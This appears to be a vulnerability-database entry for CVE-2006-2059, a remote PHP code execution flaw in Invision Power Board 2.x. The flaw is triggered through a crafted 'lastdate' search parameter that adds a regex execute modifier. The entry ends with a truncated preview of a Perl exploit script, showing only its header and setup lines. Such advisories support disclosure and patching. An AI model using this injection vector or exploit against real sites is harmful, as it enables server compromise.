5
CVSSv2

CVE-2006-2059

Published: 26/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

action_public/search.php in Invision Power Board (IPB) 2.1.x and 2.0.x prior to 20060425 allows remote malicious users to execute arbitrary PHP code via a search with a crafted value of the lastdate parameter, which alters the behavior of a regular expression to add a "#e" (execute) modifier.

Vulnerable Product Search on Vulmon Subscribe to Product

invision power services invision power board 2.1.5_2006-03-08

Exploits

#!/usr/bin/perl ## Invision Power Board 2* commands execution exploit by RST/GHC ## vulnerable versions <= 215 ## tested on 214, 202 ## ## (c)oded by 1dtw0lf ## RST/GHC ## rstvoidru ## ghcru use IO::Socket; use Getopt::Std; getopts("l:h:p:d:f:v:"); $host = $opt_h; $dir = $opt_d; $login = $opt_l; $passwor ...